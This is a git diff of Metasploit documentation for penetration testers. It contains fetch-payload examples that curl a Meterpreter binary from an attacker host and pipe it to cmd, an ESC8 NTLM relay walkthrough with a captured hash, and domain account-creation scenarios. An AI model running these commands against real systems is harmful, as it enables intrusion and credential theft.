+generated will be a much smaller command to download the original command and pipe it into the shell.
+The following example shows both the original command to download and execute the binary and the command to pipe the
+original fetch command directly to the shell.  Since this requires two downloads, it is less stealthy, but the
+command to run on the target is significantly shorter.
+``` msf
+msf6 payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
+[*] Command served: curl -so %TEMP%\DpRdBIfeyax.exe http://10.5.135.117:8080/zw3LGTh9FtaLJ4bCQRAWdw & start /B %TEMP%\DpRdBIfeyax.exe
+
+[*] Command to run on remote host: curl -s http://10.5.135.117:8080/test|cmd
+```
+
 ## Using it in an exploit
 Using Fetch Payloads is no different than using any other command payload.  First, give users access to the Fetch
 payloads for a given platform by adding a target that supports `ARCH_CMD` and the desired platform, either `windows` or
@@ -34,6 +34,13 @@ use auxiliary/gather/ldap_query
 run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 ```

+Alternatively, the URI syntax can be used:
+
+```
+use auxiliary/gather/ldap_query
+run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local action=ENUM_ACCOUNTS
+```
+
 Example output:

 ```msf
@@ -75,7 +82,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
 - `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
 - `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
 - `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
@@ -96,6 +103,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
 - `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
 - `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+- `ENUM_PRE_WINDOWS_2000_COMPUTERS` - Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.

 ### Kerberos Authentication

@@ -169,7 +169,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -124,6 +124,8 @@ The following protocols are currently supported, and described in more detail be
 - file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings
 - http
 - https
+- ldap
+- ldaps
 - mysql
 - postgres
 - smb
@@ -118,9 +118,9 @@ The values that are common to both `HTTP(S)` and `TCP` transports are:
    * `tcp://:<port>` - indicates that this payload is a _bind_ payload listening on the specified port (note that no host is specified).
    * `http://<host>:<port>/<uri>` - indicates that this payload is an HTTP connection (can only be _reverse_).
    * `https://<host>:<port>/<uri>` - indicates that this payload is an HTTPS connection (can only be _reverse_).
-* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the **Timeout documentation** (link coming soon).
+* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.

 The layout of this block in memory looks like the following:

@@ -159,8 +159,8 @@ At this time, there are no `TCP`-specific configuration values, as the common co
    * `http://<proxy ip>:<proxy port>` in the case of `HTTP` proxies.
    * `socks=<socks ip>:<sock port>` in the case of `socks` proxies.
 * **Proxy user name** - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is `64` characters in size (`wchar_t`).
-* Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
-*** User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
+* **Proxy password** - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
+* **User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
 * **Expected SSL certificate hash** - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using `HTTPS`. This value contains the `20`-byte SHA1 hash of the expected certificate. For more information, please read the **SSL certificate validation documentation** (link coming soon).

 All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain `HTTP` connections. Values that are not used should be zeroed out.
@@ -207,7 +207,7 @@ As already mentioned, more than one of these transport configuration blocks can

 ### Extension configuration block

-The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have **Stageless payloads** (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the **Stageless payloads** (link coming soon) documentation.
+The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have [[Stageless payloads|./Meterpreter-Stageless-Mode.md]], and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the [[Stageless payloads|./Meterpreter-Stageless-Mode.md]] documentation.

 The extension configuration block also functions as a "list" to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain:

@@ -0,0 +1,41 @@
+Payloads for Metasploit Framework can now be tested when opening pull requests. This is handled by GitHub actions within 
+our CI, this workflow will build the payloads using the appropriate repositories and branches. It will then run our 
+acceptance tests against those changes. This requires adding GitHub labels for each corresponding payload repository. 
+The labels will contain the `payload-testing` prefix, each supporting testing for an external repository:
+ - `payload-testing-branch` ([https://github.com/rapid7/metasploit-payloads/](https://github.com/rapid7/metasploit-payloads/))
+ - `payload-testing-mettle-branch` ([https://github.com/rapid7/mettle/](https://github.com/rapid7/mettle/))
+
+**_Note_**:
+
+The long term aim is supporting workflow dispatches for this job, but that is currently not working as expected. So as a
+work-around we will need to edit the workflow locally. Once the testing has been completed ensure the following locally 
+changes are reverted before merging.
+
+Once the appropriate repository label is added, you will need to edit the GitHub workflow to point at the specific 
+repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
+the following lines like so:
+
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
+```yaml
+repository: foo-r7/metasploit-framework
+```
+
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
+```yaml
+ref: fixes-all-the-bugs
+```
+
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
+```yaml
+repository: foo-r7/metasploit-payloads
+```
+
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
+```yaml
+ref: fixes-all-the-payload-bugs
+```
+
+Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
+following lines would need updated:
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -10,6 +10,10 @@ flowchart TD
        update_template[<i>Update Template</i>]
        ESC4 -- abuse privileges --> update_template
    end
+    subgraph relay/esc8[<b>relay/esc8</b>]
+        ESC8(ESC8)
+        ESC8 --> web_enrollment[<i>Issuance via Web Enrollment</i>]
+    end
    subgraph icpr_cert[<b>icpr_cert</b>]
        ESC1(ESC1)
        ESC2(ESC2)
@@ -45,11 +49,12 @@ flowchart TD
    normal --> PKINIT
    normal --> SCHANNEL
    update_template --> ESC1
+    web_enrollment --> PKINIT
+    web_enrollment --> SCHANNEL
 ```

-The chart above showcases how one can go about attacking five unique AD CS
-vulnerabilities, taking advantage of various flaws in how certificate templates are
-configured on an Active Directory Certificate Server.
+The chart above showcases how one can go about attacking each of the AD CS vulnerabilities supported by Metasploit,
+taking advantage of various flaws in how certificate templates are configured on an Active Directory Certificate Server.

 The following sections will walk through each of these steps, starting with enumerating
 certificate templates that the server has to offer and identifying those that are
@@ -81,6 +86,7 @@ attacks that they found they could conduct via misconfigured certificate templat
  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
 - ESC7 - Vulnerable Certificate Authority Access Control
 - ESC8 - NTLM Relay to AD CS HTTP Endpoints
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc8]]

 Later, additional techniques were disclosed by security researchers:

@@ -110,8 +116,8 @@ Later, additional techniques were disclosed by security researchers:
  - [EKUwu: Not just another AD CS ESC](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc15]]

-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC13 and ESC15. As such,
-this page only covers exploiting ESC1 through ESC4, ESC13 and ESC15 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC13 and ESC15. As such, this page only
+covers exploiting that subset of ESC flaws.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -866,6 +872,55 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
 used to authenticate to Active Directory as the Domain Admin.

+# Exploiting ESC8
+ESC8 leverages relaying NTLM authentication from an SMB server (running on Metasploit) to the HTTP(S) AD CS Web
+Enrollment portal running on a remote target. The attacker will need to coerce a client with privileges to authenticate
+to the target portal to authenticate to Metasploit instead. This can be achieved via a few techniques, including name
+poisoning via the `capture` plugin, coercion via the `auxiliary/scanner/dcerpc/petitpotam` module, or even a well placed
+UNC path. Once authentication has been relayed and an authorized HTTP session has been established, the attacker can
+query available certificate templates as well as issue them.
+
+Exploitation of this flaw is facilitated through the `auxiliary/server/relay/esc8` module which handles starting the SMB
+relay server and enables configuration of what happens when relaying is successful. Users can select from different
+operational "modes" via the MODE datastore option which controls what the module will do. For a full description, see
+the modules documentation. The default mode, "AUTO" will issue a User certificate if the relayed connection is for a
+user account or a Machine certificate if it's for a machine account. Once this certificate has been issued, it can be
+used for authentication. See the [Authenticating With A Certificate](#authenticating-with-a-certificate) section for
+more information.
+
+In the following example the AUTO mode is used to issue a certificate for the MSFLAB\smcintyre once they have
+authenticated.
+
+```msf
+msf6 auxiliary(server/relay/esc8) > set RHOSTS 172.30.239.85
+msf6 auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 1.
+msf6 auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Relaying to next target http://172.30.239.85:80/certsrv/
+[+] Identity: MSFLAB\smcintyre - Successfully authenticated against relay target http://172.30.239.85:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 172.30.239.85
+[SMB] NTLMv2-SSP Username   : MSFLAB\smcintyre
+[SMB] NTLMv2-SSP Hash       : smcintyre::MSFLAB:821ad4c6b40475f4:07a6e0fd89d9af86a5b0e12d24915b4d:010100000000000071fe99aa0a27db01eabcbc6e8fcb6ed20000000002000c004d00530046004c00410042000100040044004300040018006d00730066006c00610062002e006c006f00630061006c0003001e00440043002e006d00730066006c00610062002e006c006f00630061006c00050018006d00730066006c00610062002e006c006f00630061006c000700080071fe99aa0a27db01060004000200000008003000300000000000000001000000002000004206ecc9e398d7766166f0f45d8bdcf7708c8f278f2cff1cc58017f9acf0f5400a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000
+
+[*] Creating certificate request for MSFLAB\smcintyre using the User template
+[*] Generating CSR...
+[*] CSR Generated
+[*] Requesting relay target generate certificate...
+[+] Certificate generated using template User and MSFLAB\smcintyre
+[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=184&
+[+] Certificate for MSFLAB\smcintyre using template User saved to /home/smcintyre/.msf4/loot/20241025142116_default_172.30.239.85_windows.ad.cs_995918.pfx
+[*] Relay tasks complete; waiting for next login attempt.
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+```
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
@@ -873,7 +928,7 @@ administrative privileges, rather the privileges that are gained are those of th
 certificate template's issuance policy. The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module is capable of
 identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose
 permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the
-ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions.
+ESC13-Test template is vulnerable to ESC13 and will yield a ticket including the ESC13-Group permissions.

 ```
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
@@ -112,3 +112,19 @@ The following steps assume that you have installed an AD CS on either a new or e
 6. Click `Apply` and then click `OK` to issue the certificate.
 7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
 8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC8 Vulnerable Host
+1. Follow instructions for creating an AD CS enabled server
+2. Select Add Roles and Features
+3. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
+4. For each selection, accept the default for any pop-up.
+5. Accept the default features and install.
+6. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
+7. Under Credentials, accept the default
+8. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
+9. In CA for CES, accept the defaults
+10. In Authentication Types, accept the default integrated authentication
+11. In Service account for CES, select `Use built-in application pool identity`
+12. Accept default integrated authentication for CEP
+13. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
+14. Accept the remaining defaults.
@@ -30,10 +30,29 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 ### Windows

-If you are running a Windows machine
+#### Windows 10 or above

-* Install [chocolatey](https://chocolatey.org/)
-* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install [winget](https://learn.microsoft.com/en-us/windows/package-manager/winget/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
+* Install pcaprub dependencies from your PowerShell terminal:
+
+```
+[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')
+
+Expand-Archive -Path "C:\Windows\Temp\WpdPack_4_1_2.zip" -DestinationPath "C:\"
+```
+
+Install a version of PostgreSQL:
+
+```
+Install-Module -Name Microsoft.WinGet.Client
+Install-WinGetPackage -id PostgreSQL.PostgreSQL.17
+```
+
+#### Pre-Windows 10
+
+* Install [choco](https://chocolatey.org/install)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
 * Install pcaprub dependencies from your cmd.exe terminal:

 ```
@@ -46,7 +65,7 @@ choco install 7zip
 Install a version of PostgreSQL:

 ```
-choco install postgresql12
+choco install postgresql17
 ```

 ## Set up your local copy of the repository
@@ -82,7 +101,9 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+- Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+
+#### Linux

 ```bash
 cd ~/git/metasploit-framework
@@ -90,8 +111,20 @@ ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit
 ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge
 ```

+#### Windows
+
+```powershell
+cd ~/git/metasploit-framework
+mkdir .githooks
+git config --local core.hooksPath .githooks/
+New-Item -Path pre-commit -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+New-Item -Path post-merge -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+```
+
 ## Install Ruby

+ **Note:** If you are using Windows, ruby installed in [Install dependencies](#install-dependencies) section, so you can skip this section
+
 Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated.  Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict.  For these reasons, it is advisable  to use a Ruby manager.

 You could just install Ruby directly (eg. `sudo apt install ruby-dev`), but you may likely end up with the incorrect version and no way to update.  Instead, consider using one of the many different [Ruby environment managers] available.  The Metasploit team prefers [rbenv] and [rvm] (note that [rvm] does require a re-login to complete).
@@ -101,9 +134,9 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git
 ```
 $ cd ~/git/metasploit-framework
 $ cat .ruby-version
-3.0.2
+3.2.5
 $ ruby -v
-ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
+ruby 3.2.5 (2024-07-26 revision 31d0f1a2e7) [x86_64-darwin23]
 ```

 Note: the Ruby version is likely to change over time, so don't rely on the output in the above example.  Instead, confirm your `ruby -v` output with the version number listed in the `.ruby-version` file.
@@ -856,6 +856,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Loading-Test-Modules.md'
          },
+          {
+            path: 'Payload-Testing.md'
+          },
          {
            path: 'Measuring-Metasploit-Performance.md'
          }
@@ -3,9 +3,9 @@ Request certificates via MS-ICPR (Active Directory Certificate Services). Depend
 template's configuration the resulting certificate can be used for various operations such as authentication.
 PFX certificate files that are saved are encrypted with a blank password.

-This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
+This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.

-## Module usage 
+## Module usage

 1. From msfconsole
 2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
@@ -0,0 +1,109 @@
+## Vulnerable Application
+Add, lookup and delete user / machine accounts via MS-SAMR. By default standard active directory users can add up to 10
+new computers to the domain (MachineAccountQuota). Administrative privileges however are required to delete the created
+accounts, or to create/delete user accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `ACCOUNT_NAME` option for `DELETE_ACCOUNT` and `LOOKUP_ACCOUNT` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### ACCOUNT_NAME
+
+The account name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`ADD_USER`, `LOOKUP_ACCOUNT` and `DELETE_ACCOUNT` actions. If left blank for `ADD_COMPUTER`, a random, realistic name
+will be generated.
+
+### ACCOUNT_PASSWORD
+
+The password for the new account. This option is only used for the `ADD_COMPUTER` and `ADD_USER` actions. If left 
+blank, a random value will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `ACCOUNT_NAME` is set, that value will be
+used and the module will fail if the specified name is already in use. If `ACCOUNT_NAME` is *not* set, a random value
+will be used.
+
+### ADD_USER
+
+Add a new user to the domain. The account being used to create the new user must have permission to do so. 
+
+After the user account is created, the password will be set for it. The `ACCOUNT_NAME` option must be set to the name of
+the account to create. The module will fail if the specified name is already in use.
+
+### DELETE_ACCOUNT
+
+Delete a user or computer account from the domain. This action requires that the `ACCOUNT_NAME` option be set.
+
+### LOOKUP_ACCOUNT
+
+Lookup a user or computer account in the domain. This action verifies that the specified account exists, and looks up
+its security ID (SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
+
+Module options (auxiliary/admin/dcerpc/samr_account):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT _NAME                      no        The computer name
+   ACCOUNT_PASSWORD                   no        The password for the new computer
+   RHOSTS            192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             445              yes       The target port (TCP)
+   SMBDomain         .                no        The Windows domain to use for authentication
+   SMBPass           Password1        no        The password for the specified username
+   SMBUser           aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_account) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_account) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
+
+msf6 auxiliary(admin/dcerpc/samr_account) >
+```
@@ -1,100 +0,0 @@
-## Vulnerable Application
-Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
-computers to the domain. Administrative privileges however are required to delete the created accounts.
-
-## Verification Steps
-
-1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
-3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
-4. Run the module and see that a new machine account was added
-
-## Options
-
-### SMBDomain
-
-The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
-default value.
-
-### COMPUTER_NAME
-
-The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
-`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
-
-### COMPUTER_PASSWORD
-
-The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
-will be generated.
-
-## Actions
-
-### ADD_COMPUTER
-
-Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
-user has exceeded the maximum number of computer accounts that they are allowed to create.
-
-After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
-used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
-will be used.
-
-### DELETE_COMPUTER
-
-Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
-
-### LOOKUP_COMPUTER
-
-Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
-(SID), which includes the relative ID (RID) as the last component.
-
-## Scenarios
-
-### Windows Server 2019
-
-First, a new computer account is created and its details are logged to the database.
-
-```
-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
-RHOSTS => 192.168.159.96
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
-SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
-SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
-
-Module options (auxiliary/admin/dcerpc/samr_computer):
-
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS             192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass            Password1        no        The password for the specified username
-   SMBUser            aliddle          no        The username to authenticate as
-
-
-Auxiliary action:
-
-   Name          Description
-   ----          -----------
-   ADD_COMPUTER  Add a computer account
-
-
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
-[*] Running module against 192.168.159.96
-
-[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
-[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > creds
-Credentials
-===========
-
-host            origin          service        public             private                           realm   private_type  JtR Format
----            ------          -------        ------             -------                           -----   ------------  ----------
-192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
-
-msf6 auxiliary(admin/dcerpc/samr_computer) >
-```
@@ -34,7 +34,15 @@ The vulnerable IOS XE versions are:
 17.11.99SW

 ## Testing
-This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
+This module was tested against the following IOS XE versions:
+
+| IOS XE Version | Appliance Series |
+|----------------|------------------|
+| 16.12.3        | CSR1000v         |
+| 17.03.02       | CSR1000v         |
+| 17.06.05       | C8000v           |
+
+To test this module you will need to either:

 * Acquire a hardware device running one of the vulnerable firmware versions listed above.

@@ -87,6 +95,7 @@ modes are `user`, `privileged`, and `global`.

 ## Scenarios

+### IOS XE 16.12.03 (CSR1000v)
 ```
 msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
@@ -169,4 +178,85 @@ msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show
 *15:24:05.110 UTC Fri Nov 3 2023
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+```
+
+### IOS XE 17.06.05 (C8000v)
+
+```
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 
+
